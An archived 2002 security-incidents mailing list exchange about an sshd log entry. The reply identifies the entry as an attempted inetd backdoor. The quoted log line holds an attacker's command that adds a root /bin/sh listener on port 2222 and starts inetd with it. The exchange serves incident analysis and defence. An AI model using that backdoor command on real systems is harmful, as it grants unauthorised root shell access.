Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Security Incidents mailing list archives

Re: OpenSSH Attack?
From: Bill McCarty <bmccarty () apu edu>
Date: Mon, 01 Jul 2002 17:25:26 -0700
Hi Ulrich,
These lines resemble an attempt to add a line to the /etc/inetd.conf file in order to establish a backdoor. Probably, an attacker's autorooter went awry, thought it had compromised the victim host, and prematurely attempted to upload a backdoor. Nevertheless, I suggest you check whether any of your systems are listening on unusual ports, such as 2222. 

Cheers,
--On Saturday, June 29, 2002 10:01 PM +0200 Ulrich Keil <ulrich () der-keiler de> wrote: 


I run OpenSSH 3.3p1 on linux (sparc) and found these line in my
/var/log/messages:

Jun 28 22:27:27 www sshd[21761]: Bad protocol version identification
'echo "2222 stream tcp nowait root /bin/sh sh -i">>
/tmp/h;/usr/sbin/inetd /tmp/hn/inecho "2222 strea' from 192.192.230.233


---------------------------------------------------
Bill McCarty

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]